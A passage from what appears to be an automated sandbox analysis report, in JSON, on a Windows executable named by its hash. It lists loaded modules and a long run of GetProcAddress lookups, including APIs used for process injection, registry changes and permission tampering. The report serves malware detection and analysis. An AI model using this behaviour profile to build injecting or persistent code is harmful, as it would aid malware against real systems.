\"svchost.exe\" loaded module \"WS2_32.DLL\" at base 75ff0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 71670000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 6cf10000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 754f0000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75ad0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74b90000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004968)\n \"cmd.exe\" 